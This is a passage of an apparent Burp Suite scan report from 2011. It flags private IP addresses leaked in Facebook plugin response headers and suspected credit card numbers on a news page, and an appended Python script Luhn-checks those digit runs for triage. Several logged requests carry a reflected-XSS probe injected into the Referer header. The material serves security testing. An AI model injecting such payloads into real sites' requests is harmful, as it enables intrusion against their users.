Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.120.130
X-Cnection: close
Date: Mon, 09 May 2011 13:59:33 GMT
Content-Length: 7014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.36. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.78.110
X-Cnection: close
Date: Mon, 09 May 2011 14:08:54 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.37. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.70.115
X-Cnection: close
Date: Mon, 09 May 2011 14:08:52 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.38. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.72.102
X-Cnection: close
Date: Mon, 09 May 2011 14:08:51 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.39. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.91.120
X-Cnection: close
Date: Mon, 09 May 2011 14:08:51 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.40. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=158577044196953&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b28cbe2%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&layout=button_count&locale=en_GB&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.91.130
X-Cnection: close
Date: Mon, 09 May 2011 14:04:45 GMT
Content-Length: 9581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.41. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.93.128
X-Cnection: close
Date: Mon, 09 May 2011 14:08:50 GMT
Content-Length: 8563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.42. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.75.113
X-Cnection: close
Date: Mon, 09 May 2011 14:08:54 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.43. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.thevine.com.au%2Fmusic%2Fblogs%2Fmusic-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&layout=button_count&show_faces=true&width=75&action=like&colorscheme=light&height=30 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.87.104
X-Cnection: close
Date: Mon, 09 May 2011 14:06:59 GMT
Content-Length: 7157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.44. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.106.122
X-Cnection: close
Date: Mon, 09 May 2011 14:08:53 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.45. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.90.123
X-Cnection: close
Date: Mon, 09 May 2011 14:08:54 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.46. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.115.117
X-Cnection: close
Date: Mon, 09 May 2011 14:08:53 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.47. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Firishtimestheticket&width=300&colorscheme=light&connections=10&stream=false&header=false&height=270 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.80.104
X-Cnection: close
Date: Mon, 09 May 2011 14:04:05 GMT
Content-Length: 12967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.48. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=158577044196953&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df251994bac%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=258&href=http%3A%2F%2Fwww.facebook.com%2Fnmemagazine&locale=en_GB&sdk=joey&show_faces=true&stream=false&width=356 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.106.125
X-Cnection: close
Date: Mon, 09 May 2011 14:04:49 GMT
Content-Length: 18197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21. Credit card numbers disclosed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orlandosentinel.com
Path:   /business/os-cfb-cover-casey-tv-20110509,0,6839926.story

Issue detail

The following credit card numbers were disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /business/os-cfb-cover-casey-tv-20110509,0,6839926.story HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i7s30z1n1
Last-Modified: Mon, 09 May 2011 13:58:29 GMT
Vary: Accept-Encoding
Cache-Control: private, max-age=142
Date: Mon, 09 May 2011 13:59:15 GMT
Connection: close
Content-Length: 227706


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//E
...[SNIP]...
<img src="http://www.zap2it.com/media/thumbnails/photogallery/2010-12/57991005-01215646.jpg" alt="Midseason report card: Zap2it grades the progress on fall 2010's new shows" width="80" height="44" />
...[SNIP]...
<img src="http://www.zap2it.com/media/thumbnails/photogallery/2010-12/58250815-20155633.jpg" alt="TV's Underrated stars of 2010: Zap2it's Year in Review" width="80" height="44" />
...[SNIP]...
<img src="http://www.zap2it.com/media/thumbnails/photogallery/2010-12/58114906-29092207.jpg" alt="TV's Guilty Pleasures of 2010: Zap2it's Year in Review" width="80" height="44" />
...[SNIP]...
<img src="http://www.zap2it.com/media/thumbnails/photogallery/2010-12/58070983-20155250.jpg" alt="Top 10 Epic TV Bromances of 2010" width="80" height="44" />
...[SNIP]...
<img src="http://media.trb.com/media/thumbnails/htmlpage/2010-04/52786402-05054957.jpg" alt="Casey Anthony in court: See comments from Monday's live chat" width="80" height="44" />
...[SNIP]...
<img height="34" alt="Orlando Sentinel Text Alerts" width="32" src="http://media.trb.com/media/thumbnails/graphic/2011-03/59698616-29153332.png" border="0" />
...[SNIP]...
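
The hits behind this finding are visible in the snippets above: every image filename carries a 16-digit run such as 57991005-01215646, and digit runs that satisfy the Luhn checksum are what a scanner flags. The script below is an added example, not part of the original report or of the scanner that produced it. It extracts candidate runs from a response fragment, applies the Luhn checksum, guesses the issuer from the leading digits and keeps the surrounding text so a reviewer can triage each hit. The sample text is the six img tags copied from the snippets above (alt text shortened); the issuer ranges are a simplified table supplied here for illustration, not a complete BIN list.

```python
import re

# Constructed sample: the six <img> tags from the www.orlandosentinel.com response snippets above.
SAMPLE_RESPONSE = """
<img src="http://www.zap2it.com/media/thumbnails/photogallery/2010-12/57991005-01215646.jpg" alt="Midseason report card" width="80" height="44" />
<img src="http://www.zap2it.com/media/thumbnails/photogallery/2010-12/58250815-20155633.jpg" alt="TV's Underrated stars of 2010" width="80" height="44" />
<img src="http://www.zap2it.com/media/thumbnails/photogallery/2010-12/58114906-29092207.jpg" alt="TV's Guilty Pleasures of 2010" width="80" height="44" />
<img src="http://www.zap2it.com/media/thumbnails/photogallery/2010-12/58070983-20155250.jpg" alt="Top 10 Epic TV Bromances of 2010" width="80" height="44" />
<img src="http://media.trb.com/media/thumbnails/htmlpage/2010-04/52786402-05054957.jpg" alt="Casey Anthony in court" width="80" height="44" />
<img height="34" alt="Orlando Sentinel Text Alerts" width="32" src="http://media.trb.com/media/thumbnails/graphic/2011-03/59698616-29153332.png" border="0" />
"""

# 13 to 19 digits, optionally separated by single spaces or hyphens, not embedded in a longer digit run.
CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: double every second digit from the right (subtract 9 if > 9); sum must be 0 mod 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def brand_guess(digits: str):
    """Simplified issuer ranges (an assumption for illustration, not a complete BIN table)."""
    n = len(digits)
    two, four = int(digits[:2]), int(digits[:4])
    if digits[0] == "4" and n in (13, 16, 19):
        return "Visa"
    if n == 16 and (51 <= two <= 55 or 2221 <= four <= 2720):
        return "MasterCard"
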